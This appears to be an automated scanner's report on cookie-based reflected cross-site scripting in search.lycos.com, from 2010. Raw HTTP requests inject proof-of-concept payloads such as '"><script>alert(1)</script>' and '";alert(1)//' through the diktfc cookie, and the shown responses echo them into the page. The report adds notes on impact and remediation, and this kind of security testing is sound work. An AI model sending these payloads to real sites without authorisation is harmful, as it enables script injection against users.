GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa"%3balert(1)//caad74f47b6; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:14 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17135
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1517b"><script>alert(1)</script>026051adaf3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/image/&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332c"%3balert(1)//d09a29f118f was submitted in the diktfc cookie. This input was echoed as 3332c";alert(1)//d09a29f118f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c"%3balert(1)//d09a29f118f; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17319
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e92cb"><script>alert(1)</script>2113f4c409d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:06 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/video/&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184a0"%3balert(1)//a41b54937a was submitted in the diktfc cookie. This input was echoed as 184a0";alert(1)//a41b54937a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0"%3balert(1)//a41b54937a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17323